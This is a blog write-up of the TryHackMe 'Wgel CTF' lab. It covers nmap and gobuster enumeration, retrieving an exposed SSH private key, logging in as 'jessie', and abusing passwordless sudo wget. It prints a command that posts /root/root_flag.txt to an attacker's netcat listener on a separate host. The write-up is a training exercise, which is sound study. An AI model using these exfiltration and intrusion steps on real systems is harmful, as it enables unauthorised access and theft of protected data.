Wgel CTF TryHackMe Write-up

Wgel CTF is an easy, beginner-friendly capture the flag exercise on TryHackMe. It features bad code commenting practices, a publicly available SSH key, and poorly configured sudo permissions which lead to exfiltration of data from the target server.

Disclaimer 2: This post will include spoilers for the room, so be mindful of reading this if you want to solve the challenge on your own. Flags and other secrets will remain obfuscated.

Enumeration

We start off the exercise with a pretty aggressive Nmap scan to minimize steps, since we aren't worried about being detected in this case. We would take more careful precautions if this were a real life pentest, but to speed up the process we are going this route.

nmap -A -T4 10.10.54.54

The scan reveals SSH is available on port 22 and that there is an HTTP server behind port 80. Let's go ahead and check out that web page and see what we find.


Exploration and further enumeration

Navigating to the webpage reveals the default Apache2 landing page. Usually, there isn't much to find here, so we are going to jump straight to enumerating other potential directories with gobuster.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.54.54

The scan reveals a few new directories, including /sitemap and /server-status. After spending entirely too much time combing through both pages and their source code to find nothing of note, we decide to enumerate each one further with gobuster. Thankfully, we find a wordlist that provides some results on /sitemap.

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u 10.10.54.54/sitemap

This step reveals some information about the target, including a hidden .ssh directory. Navigating to the directory in the browser reveals an RSA private key. We download the file to our computer for use at a later time.

wget http://10.10.54.54/sitemap/.ssh/id_rsa

Taking a Step Back

We seem to have hit a roadblock. We have an SSH private key but no username to go along with it. So, we take a step back to see what we missed thus far.

We revisit the Apache2 landing page from earlier and give it a thorough evaluation. After scanning the source code, we see what we missed. The developer seems to have left a comment in the code, revealing a potential username we can try with our recently uncovered RSA key: Jessie.

sudo ssh -i id_rsa jessie@10.10.54.54

Trying to connect with the key warns us that the permissions are too open. So, we need to fix that before we can connect. Thankfully, changing the permissions isn't difficult at all.

chmod 600 id_rsa

We then try to connect again via SSH, and bingo, we are in. Now, let's identify that user flag using the locate command.

locate user_flag.txt

Escalating Privileges

Now that we have captured our first flag, it's time to escalate our privileges and go after the root flag.

We first check what commands Jessie can run as root.

sudo -l

This reveals that we can run wget as sudo with no password. Let's head over to GTFOBins to see what we can find.

Now, using what we learn from GTFOBins, we can try to escalate our privileges to become root and capture the flag that way, but I couldn't get that to work even after quite a bit of tinkering.

Instead, we are going to use wget to exfiltrate the root flag fairly easily. First, we need to set up a netcat listener on our attacking machine. And of course we are going to use port 1337 because we are elite hackerz.

nc -lvnp 1337

Now, on the victim machine, we need to use wget to capture the root flag and send it to our attacking machine.

sudo wget --post-file=/root/root_flag.txt 10.10.229.4:1337

And there it is, the root flag: the second and final answer in the Wgel CTF room.


Summary

And with that, we've completed the challenge. We started by enumerating all the ports and services on the target. We then moved to scanning for directories on the domain and reading webpage source code.

Through this process, we were able to obtain SSH credentials to log into the target, gaining a foothold into the system. Finally, we used misconfigured sudo privileges to exfiltrate the target data owned by the root user.

Tags: #CTF Write.as Comments: Discuss...